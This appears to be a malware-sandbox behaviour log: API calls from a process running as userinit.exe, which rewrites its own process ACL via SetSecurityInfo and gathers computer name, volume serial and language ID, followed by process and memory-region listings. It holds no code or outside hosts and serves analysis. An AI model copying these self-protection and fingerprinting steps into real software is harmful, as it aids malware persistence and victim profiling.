[0090.731] LocalFree (hMem=0x216f40) returned 0x0
[0090.731] ConvertStringSidToSidA () returned 0x1
[0090.731] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fd1c, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2a7fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0090.731] IsValidSid (pSid=0x2a7fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0090.731] ConvertSidToStringSidA () returned 0x1
[0090.732] LocalFree (hMem=0x216f58) returned 0x0
[0090.732] LocalFree (hMem=0x216f40) returned 0x0
[0090.732] GetCurrentProcessId () returned 0xf48
[0090.732] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0xf48) returned 0x1d0
[0090.732] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.732] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0090.732] GetSecurityInfo () returned 0x0
[0090.735] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.735] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0090.735] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x210f28, pControl=0x12e5f2, lpdwRevision=0x12e5ec | out: pControl=0x12e5f2, lpdwRevision=0x12e5ec) returned 1
[0090.735] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.735] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0090.735] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x210f28, pOwner=0x12e5e8, lpbOwnerDefaulted=0x12e5dc | out: pOwner=0x12e5e8*=0x0, lpbOwnerDefaulted=0x12e5dc) returned 1
[0090.735] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.735] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0090.735] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x210f28, pGroup=0x12e5e8, lpbGroupDefaulted=0x12e5dc | out: pGroup=0x12e5e8*=0x0, lpbGroupDefaulted=0x12e5dc) returned 1
[0090.736] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.736] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0090.736] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x210f28, lpbDaclPresent=0x12e5e0, pDacl=0x12e5d4, lpbDaclDefaulted=0x12e5dc | out: lpbDaclPresent=0x12e5e0, pDacl=0x12e5d4, lpbDaclDefaulted=0x12e5dc) returned 1
[0090.736] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.736] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0090.736] IsValidAcl (pAcl=0x210f3c) returned 1
[0090.736] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.736] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0090.736] GetAce (in: pAcl=0x210f3c, dwAceIndex=0x0, pAce=0x12e474 | out: pAce=0x12e474*=0x210f44) returned 1
[0090.736] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fe74, pSourceSid=0x210f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a7fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.736] IsValidSid (pSid=0x2a7fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.736] ConvertSidToStringSidA () returned 0x1
[0090.736] LocalFree (hMem=0x217018) returned 0x0
[0090.736] GetAce (in: pAcl=0x210f3c, dwAceIndex=0x1, pAce=0x12e474 | out: pAce=0x12e474*=0x210f5c) returned 1
[0090.736] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7ff60, pSourceSid=0x210f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a7ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.736] IsValidSid (pSid=0x2a7ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.736] ConvertSidToStringSidA () returned 0x1
[0090.736] LocalFree (hMem=0x217018) returned 0x0
[0090.737] GetAce (in: pAcl=0x210f3c, dwAceIndex=0x2, pAce=0x12e474 | out: pAce=0x12e474*=0x210f70) returned 1
[0090.737] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a729c0, pSourceSid=0x210f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2a729c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0090.737] IsValidSid (pSid=0x2a729c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0090.737] ConvertSidToStringSidA () returned 0x1
[0090.737] LocalFree (hMem=0x217018) returned 0x0
[0090.737] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.737] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0090.737] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x210f28, lpbSaclPresent=0x12e5e4, pSacl=0x12e5d8, lpbSaclDefaulted=0x12e5dc | out: lpbSaclPresent=0x12e5e4, pSacl=0x12e5d8, lpbSaclDefaulted=0x12e5dc) returned 1
[0090.737] LocalFree (hMem=0x210f28) returned 0x0
[0090.737] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.737] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.737] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0090.737] GetLengthSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0090.737] GetLastError () returned 0x0
[0090.737] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.737] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0090.738] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.738] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0090.738] InitializeAcl (in: pAcl=0x217fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x217fa8) returned 1
[0090.738] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.738] GetLengthSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0090.738] GetLastError () returned 0x0
[0090.738] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.738] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.738] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0090.738] SetLastError (dwErrCode=0x0)
[0090.738] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.738] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0090.738] GetSidSubAuthorityCount (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a7f615
[0090.755] GetLastError () returned 0x0
[0090.755] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.755] SetLastError (dwErrCode=0x0)
[0090.755] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.755] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0090.755] GetSidIdentifierAuthority (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a7f616
[0090.755] GetLastError () returned 0x0
[0090.755] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.755] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.755] SetLastError (dwErrCode=0x0)
[0090.755] GetSidSubAuthorityCount (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a7f615
[0090.755] GetLastError () returned 0x0
[0090.755] SetLastError (dwErrCode=0x0)
[0090.755] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.755] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0090.755] GetSidSubAuthority (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2a7f61c
[0090.755] GetLastError () returned 0x0
[0090.756] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.756] GetLengthSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0090.756] GetLastError () returned 0x0
[0090.756] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.756] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0090.756] AddAce (in: pAcl=0x217fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x202f90, nAceListLength=0x14 | out: pAcl=0x217fa8) returned 1
[0090.756] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.756] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0090.756] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.756] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0090.756] SetSecurityInfo () returned 0x0
[0090.756] CloseHandle (hObject=0x1d0) returned 1
[0090.757] GetComputerNameA (in: lpBuffer=0x2a7fd84, nSize=0x12e8ac | out: lpBuffer="CRH2YWU7", nSize=0x12e8ac) returned 1
[0090.757] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e798, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.757] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e894, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e8a8, lpMaximumComponentLength=0x12e8a4, lpFileSystemFlags=0x12e8a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e8a8*=0x90c08a66, lpMaximumComponentLength=0x12e8a4*=0xff, lpFileSystemFlags=0x12e8a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.758] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e7a0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.758] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e894, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e8a8, lpMaximumComponentLength=0x12e8a4, lpFileSystemFlags=0x12e8a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e8a8*=0x90c08a66, lpMaximumComponentLength=0x12e8a4*=0xff, lpFileSystemFlags=0x12e8a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.758] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e7a0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.758] VirtualAlloc (lpAddress=0x2a80000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a80000
[0090.758] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e894, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e8a8, lpMaximumComponentLength=0x12e8a4, lpFileSystemFlags=0x12e8a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e8a8*=0x90c08a66, lpMaximumComponentLength=0x12e8a4*=0xff, lpFileSystemFlags=0x12e8a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.759] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e798, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.759] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e894, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e8a8, lpMaximumComponentLength=0x12e8a4, lpFileSystemFlags=0x12e8a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e8a8*=0x90c08a66, lpMaximumComponentLength=0x12e8a4*=0xff, lpFileSystemFlags=0x12e8a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.759] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e798, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.759] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e894, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e8a8, lpMaximumComponentLength=0x12e8a4, lpFileSystemFlags=0x12e8a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e8a8*=0x90c08a66, lpMaximumComponentLength=0x12e8a4*=0xff, lpFileSystemFlags=0x12e8a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.759] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e798, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.759] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e894, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e8a8, lpMaximumComponentLength=0x12e8a4, lpFileSystemFlags=0x12e8a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e8a8*=0x90c08a66, lpMaximumComponentLength=0x12e8a4*=0xff, lpFileSystemFlags=0x12e8a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.760] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e798, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.760] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e894, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e8a8, lpMaximumComponentLength=0x12e8a4, lpFileSystemFlags=0x12e8a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e8a8*=0x90c08a66, lpMaximumComponentLength=0x12e8a4*=0xff, lpFileSystemFlags=0x12e8a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.760] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e798, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.760] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e894, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e8a8, lpMaximumComponentLength=0x12e8a4, lpFileSystemFlags=0x12e8a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e8a8*=0x90c08a66, lpMaximumComponentLength=0x12e8a4*=0xff, lpFileSystemFlags=0x12e8a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.760] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e798, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.760] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e894, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e8a8, lpMaximumComponentLength=0x12e8a4, lpFileSystemFlags=0x12e8a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e8a8*=0x90c08a66, lpMaximumComponentLength=0x12e8a4*=0xff, lpFileSystemFlags=0x12e8a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.760] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e798, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.760] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e894, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e8a8, lpMaximumComponentLength=0x12e8a4, lpFileSystemFlags=0x12e8a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e8a8*=0x90c08a66, lpMaximumComponentLength=0x12e8a4*=0xff, lpFileSystemFlags=0x12e8a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.761] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e798, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.761] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e894, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e8a8, lpMaximumComponentLength=0x12e8a4, lpFileSystemFlags=0x12e8a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e8a8*=0x90c08a66, lpMaximumComponentLength=0x12e8a4*=0xff, lpFileSystemFlags=0x12e8a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.761] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e798, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.761] GetSystemDefaultLangID () returned 0x1f0409
[0090.761] VerLanguageNameA (in: wLang=0x409, szLang=0x12e84c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0090.762] ExitProcess (uExitCode=0x0)
Thread:
id = 227
os_tid = 0xf64
Thread:
id = 228
os_tid = 0xf68
Process:
id = "29"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be6a0"
os_pid = "0xf50"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2442
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2443
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2444
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2445
start_va = 0x110000
end_va = 0x14ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 2446
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2447
start_va = 0xef0000
end_va = 0xef8fff
entry_point = 0xef0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 2448
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2449
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2450
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 2451
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 2452
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 2453
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2454
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2455
start_va = 0x280000
end_va = 0x28ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000280000"
filename = ""
Region:
id = 2456
start_va = 0x290000
end_va = 0x38ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 2457
start_va = 0x6ced0000
end_va = 0x6cf53fff
entry_point = 0x6ced0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 2458
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2459
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2460
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2461
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2462
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2463
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2464
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2465
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2466
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2467
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2468
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
